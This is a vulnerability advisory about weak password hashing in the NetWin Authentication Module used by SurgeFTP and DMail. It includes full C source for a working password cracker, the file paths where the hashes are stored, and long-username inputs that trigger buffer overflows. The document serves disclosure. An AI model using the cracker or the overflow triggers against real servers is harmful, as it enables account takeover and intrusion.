COMMAND

    NetWin

SYSTEMS AFFECTED

    NetWin Authentication Module 3.0b

PROBLEM

    'ByteRage' found the following.  The NWAuth module is used by DMail,
    SurgeFTP and others (cf. www.netwinsite.com); 'ByteRage' tested
    SurgeFTP in particular.

    The source is provided for all platforms, and for Windows and most
    Unix-based platforms it is also pre-compiled, as nwauth.exe or nwauth.
    The  'NetWin  Authentication  module'  which  is used by SurgeFTP,
    DMail and other programs uses a quite 'unusual' hashing  algorithm
    to store the  password hashes.   Because of the  complexity of the
    hashing algorithm,  the users  of NWAuth  may not  be aware of it,
    but the algorithm is flawed in (at least) two ways:

        1) the password hashes can be decrypted
        2) one hash can match more than one password

    So basically we're saying that one user doesn't have one password,
    but  he  can  have  a  few  million  besides  the  one that he was
    actually assigned. (no comment...)

    Fortunately,   SurgeFTP   has   some   anti-hammering   techniques
    implemented to prevent bruteforcing.

    As for the decryption, the source code attached below (nwauthcrack.c)
    will generate all possible passwords for a given hash.  The password
    hashes used by, for example, SurgeFTP can be found within the files
    \surgeftp\admin.dat (sysadmin password) and \surgeftp\nwauth.clg (user
    passwords).

    Storing the passwords using MD5 hashes would probably be a better
    idea, perhaps combined with a simple cipher to prevent the average
    script kiddie from attacking the password file with canned tools
    (this type of hashing is done by Serv-U FTP).  And if one really
    wants to implement salting, then append the username to the password
    and feed the result into the MD5 hashing algorithm; this has the same
    effect, is easier, and is much more secure.

    NWAuth also has a lot of buffer overflows riddled throughout the
    source code (especially older versions, like 2.0), which might lead
    to serious flaws in programs that use this module.  Although version
    2.0 probably contained many more of them, here are some examples of
    buffer overflows which are still not fixed in version 3.0b:
    -> the  nwauth  -del  command  causes  an  access  violation  when
       supplied with  a very  long username,  this might  not be a big
       deal since only administrators are supposed to delete users
    -> the nwauth -lookup command causes an access violation when
       supplied with a username of about 1000 characters; this might be
       triggered by an attacker if the program passes such a username
       on from a "USER" command

    The code:

    /********************************************************************
     * nwauthcrack.c - NetWin Authentication Module password cracker    *
     * the SurgeFTP encrypted passwords can be found in the admin.dat & *
     * nwauth.clg files in the nwauth.exe directory                     *
     * by [ByteRage] <byterage@yahoo.com> [http://www.byterage.cjb.net] *
     ********************************************************************/
    
    #include <string.h>
    #include <stdio.h>
    
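    /* Characters a generated password may consist of, indexed by byte
       value (1 = allowed, 0 = not).  The set is exactly the ASCII
       digits, upper-case letters and lower-case letters; everything
       else (including every byte >= 128) is excluded.  Designated
       initializers keep the set auditable without counting columns. */
    static const char okaychars[256] = {
      ['0'] = 1, ['1'] = 1, ['2'] = 1, ['3'] = 1, ['4'] = 1,
      ['5'] = 1, ['6'] = 1, ['7'] = 1, ['8'] = 1, ['9'] = 1,
      ['A'] = 1, ['B'] = 1, ['C'] = 1, ['D'] = 1, ['E'] = 1,
      ['F'] = 1, ['G'] = 1, ['H'] = 1, ['I'] = 1, ['J'] = 1,
      ['K'] = 1, ['L'] = 1, ['M'] = 1, ['N'] = 1, ['O'] = 1,
      ['P'] = 1, ['Q'] = 1, ['R'] = 1, ['S'] = 1, ['T'] = 1,
      ['U'] = 1, ['V'] = 1, ['W'] = 1, ['X'] = 1, ['Y'] = 1,
      ['Z'] = 1,
      ['a'] = 1, ['b'] = 1, ['c'] = 1, ['d'] = 1, ['e'] = 1,
      ['f'] = 1, ['g'] = 1, ['h'] = 1, ['i'] = 1, ['j'] = 1,
      ['k'] = 1, ['l'] = 1, ['m'] = 1, ['n'] = 1, ['o'] = 1,
      ['p'] = 1, ['q'] = 1, ['r'] = 1, ['s'] = 1, ['t'] = 1,
      ['u'] = 1, ['v'] = 1, ['w'] = 1, ['x'] = 1, ['y'] = 1,
      ['z'] = 1,
    };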
    
    /* DECRYPTION ALGORITHMS */
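    /*
     * enumpwds - enumerate every string over okaychars[] that the NWAuth
     * hash `encrypted` accepts, printing each one to stdout.
     *
     * encrypted: NUL-terminated hash as stored in admin.dat / nwauth.clg.
     *            Bytes 0 and 1 seed the running state; each further byte
     *            is compared, as (byte - 'A'), against the candidate
     *            character folded into the state modulo 40.  Because only
     *            a residue modulo 40 is checked per position, several
     *            characters pass at each position, which is why one hash
     *            admits more than one password.
     * Returns the number of matching strings printed.  Returns 0 without
     * printing when the hash has fewer than 3 bytes (no password positions
     * at all) or when it is too long for the fixed 256-byte work buffers;
     * the original code indexed past those buffers for long input and, for
     * 1- or 2-byte input, wrote j[-1] and looped forever.
     *
     * The search is a depth-first backtrack over the character positions:
     * j[i] is the lowest candidate still to try at position i and
     * decrypted[] holds the current partial match.  Each restart at `brute`
     * replays positions 0..i-1 from the same j[] values, so they resolve to
     * the same characters, and only position i-1 advances.
     */
    int enumpwds(unsigned char encrypted[]) {
      int heavycrypt0;
      unsigned int num = 0, i, x;
      unsigned char j[256], decrypted[256];
      size_t len = strlen((const char *)encrypted);

      /* Need at least one hashed character after the two seed bytes, and
         room for (len - 2) characters plus the terminator in decrypted[]. */
      if (len < 3 || len - 2 >= sizeof decrypted) return 0;

      memset(j, 0, sizeof j);
    brute:
      /* seed the running state from the first two hash bytes */
      heavycrypt0 = encrypted[1] * 255 + encrypted[0];
      for (i = 0; i + 2 < len; i++) {
        /* lowest acceptable character for this position, starting at j[i] */
        for (x = j[i]; x < 256; x++) {
          if (okaychars[x] &&
              (x * (heavycrypt0 + 1)) % 40 == (unsigned)(encrypted[i + 2] - 0x41)) {
            decrypted[i] = (unsigned char)x;
            break;
          }
        }
        if (x == 256) {
          /* no candidate left at position i: backtrack one position.
             (j[] is unsigned char, so the original's "j[i-1] < 256" test
             was always true and its else branch unreachable.) */
          if (i == 0) return num;
          j[i - 1] = (unsigned char)(decrypted[i - 1] + 1);
          x = i;
          memset(j + x, 0, sizeof j - x);
          goto brute;
        }
        /* fold the chosen character into the running state */
        heavycrypt0 += x; heavycrypt0 *= 3; heavycrypt0 %= 0x7D00;
      }
      decrypted[i] = '\0';
      num++;
      printf("%s\n", decrypted);
      /* advance the last position and search for the next match */
      j[i - 1] = (unsigned char)(decrypted[i - 1] + 1);
      x = i;
      memset(j + x, 0, sizeof j - x);
      goto brute;
    }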
    /* DECRYPTION ALGORITHMS END */
    
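    /*
     * Entry point.  argv[1] is the stored NWAuth hash to enumerate.
     * Prints the banner and the hash, then every matching password (one per
     * line, printed by enumpwds) followed by the match count.
     * Returns 1 when no hash is given, 0 otherwise.
     */
    int main(int argc, char **argv) {
      printf("NetWin Authentication Module password cracker by [ByteRage]\n\n");

      if (argc < 2) {
        printf("Syntax : %s <password>\n", argv[0]);
        return 1;
      }
      printf("%s ->\n", argv[1]);

      /* enumpwds prints each candidate as it finds it; the count follows */
      printf("\n%d passwords found for %s\n",
             enumpwds((unsigned char *)argv[1]), argv[1]);
      return 0;
    }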

SOLUTION

    Nothing yet.